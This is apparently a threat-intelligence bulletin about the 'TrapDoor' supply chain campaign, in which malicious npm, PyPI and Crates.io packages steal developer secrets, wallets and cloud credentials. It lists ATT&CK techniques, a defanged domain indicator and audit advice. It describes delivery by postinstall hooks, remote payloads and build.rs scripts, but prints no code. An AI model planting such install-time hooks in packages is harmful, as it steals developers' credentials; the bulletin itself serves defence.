TrapDoor Supply Chain Attack Spreads Credential-Stealing Malware via npm, PyPI, and CratesIO

Key Points:

• A coordinated software supply chain attack, codenamed TrapDoor, is distributing credential-stealing malware through npm, PyPI, and Crates.io, affecting over 384 versions of 34 malicious packages.
• The attack targets developers in crypto, DeFi, Solana, and AI communities, aiming to steal sensitive information such as developer secrets, crypto wallets, and cloud credentials. The malware employs various techniques for persistence and lateral movement.
• Security teams should immediately audit their development environments for the presence of these malicious packages, implement strict package validation processes, and educate developers on the risks associated with using third-party libraries.

Technical Details: The malware utilizes postinstall hooks and remote JavaScript payloads executed during package imports. It also employs a build script ("build.rs") to trigger malicious code execution in Rust packages.

MITRE ATT&CK Techniques:

• T1071.001 - Application Layer Protocol: Web Protocols (Command and Control)
• T1203 - Exploit Public-Facing Application (Initial Access)
• T1046 - Network Service Discovery (Discovery)
• T1053.001 - Scheduled Task/Job: Scheduled Task (Persistence)

IOCs Mentioned:

• GitHub Pages domain: ddjidd564.github[.]io